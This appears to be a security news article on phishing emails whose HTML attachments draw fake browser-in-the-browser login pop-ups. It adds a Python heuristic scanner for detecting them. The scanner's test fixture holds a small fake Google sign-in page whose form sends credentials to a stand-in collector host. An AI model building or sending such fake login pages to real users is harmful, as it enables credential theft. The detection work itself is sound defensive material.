Phishing actors are now using a new approach: sending emails with HTML attachments that employ the ‘browser-in-the-browser’ technique.
A sample of such an email was captured by Jan Kopriva, who published the relevant write-up on the SANS Internet Storm Center site to raise awareness about the tricky threat.
Browser-in-the-browser is a technique that displays a simulated window inside an HTML page to trick a website visitor into thinking it’s a login pop-up. Because the fake window’s URL bar is drawn by the page itself rather than by the browser, it can show any legitimate domain name, making the victim believe they are about to enter their account credentials on the real platform.
This technique has been extensively employed in malicious websites that perform phishing. For example, this fairly recent report from Group-IB reveals how phishing actors use browser-in-the-browser to steal Steam accounts.
However, this is the first time that the technique appears directly in emails, which can make it even more deceptive and hard to distinguish.
As Kopriva explains in the report, the malicious email supposedly contains a proposal, urging the recipient to open the HTML attachment to read it.
Once opened, the victim is offered options to log in with popular services such as Gmail, Office 365, Outlook, Yahoo, and AOL. There’s also a catch-all option under “Other.”
Contents of the email attachment
Clicking on any of these icons generates the corresponding fake browser-in-the-browser pop-up with a valid-looking URL, while also matching the appearance of the victim’s window bar theme.
Fake login windows generated
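The behaviour described above, a page that paints its own address bar as ordinary text and then asks for a password, leaves a fingerprint that a mail gateway or analyst can look for. The following is an added example, not code from the article or from the SANS ISC write-up: a heuristic scanner for HTML attachments that flags a URL rendered as page text (the simulated URL bar) combined with a password field, and reports when the credential form posts somewhere other than the host being drawn. The indicators, the `scan_attachment` function and both sample attachments are constructed assumptions for illustration, not material from the captured email.

```python
"""Heuristic scanner for browser-in-the-browser (BitB) HTML attachments.

Added example; the indicators below are assumptions chosen for illustration,
not the rules used in the original report.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A URL that appears as *text* in the page body, as opposed to an href, is
# how a BitB page draws its fake address bar.
URL_RE = re.compile(r"https?://[\w.-]+(?:/\S*)?", re.IGNORECASE)


class _Collector(HTMLParser):
    """Collects visible text URLs, password inputs and form actions."""

    def __init__(self):
        super().__init__()
        self.text_urls = []        # URLs rendered as page text
        self.password_fields = 0   # <input type="password"> occurrences
        self.form_actions = []     # where a credential form would post
        self._skip = 0             # depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "style"):
            self._skip += 1
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        # Only text the victim can actually see counts as a drawn URL bar.
        if not self._skip:
            self.text_urls.extend(URL_RE.findall(data))


def _host(url):
    return (urlparse(url).hostname or "").lower()


def scan_attachment(html):
    """Return {'suspicious': bool, 'reasons': [..]} for one HTML attachment."""
    c = _Collector()
    c.feed(html)
    c.close()
    reasons = []
    drawn_hosts = {_host(u) for u in c.text_urls}
    if drawn_hosts:
        reasons.append(f"URL rendered as page text (simulated address bar): {sorted(drawn_hosts)}")
    if c.password_fields:
        reasons.append(f"{c.password_fields} password field(s) inside a mail attachment")
    for action in c.form_actions:
        h = _host(action)
        if h and drawn_hosts and h not in drawn_hosts:
            reasons.append(f"credentials post to {h}, not to the drawn host")
    # A fake URL bar on its own is not proof; a fake URL bar plus a password
    # prompt in an attachment is the BitB pattern worth escalating.
    return {"suspicious": bool(drawn_hosts) and c.password_fields > 0,
            "reasons": reasons}


# Constructed sample: fake pop-up with a drawn address bar and a credential form.
SAMPLE_BITB = """
<html><body>
<div class="window"><div class="titlebar">Sign in - Google Accounts</div>
<div class="addressbar">https://accounts.google.com/signin</div>
<form action="https://collector.example/drop" method="post">
  <input name="email"><input type="password" name="pw"><button>Next</button>
</form></div>
<script>var real = "https://collector.example/beacon";</script>
</body></html>
"""

# Constructed sample: ordinary newsletter that mentions a URL but asks for nothing.
SAMPLE_BENIGN = """
<html><body><p>Read the full proposal at https://example.com/news today.</p>
<a href="https://example.com/unsubscribe">Unsubscribe</a></body></html>
"""

if __name__ == "__main__":
    for name, sample in (("bitb", SAMPLE_BITB), ("benign", SAMPLE_BENIGN)):
        print(name, scan_attachment(sample))
```

The heuristic deliberately ignores `href` attributes and script bodies: a legitimate page links to URLs all the time, but it never needs to paint its own address bar as text. For an end user, the simplest manual tell remains the one from the original browser-in-the-browser research: a genuine pop-up window can be dragged outside the parent browser window, whereas a simulated one is trapped inside the page that drew it.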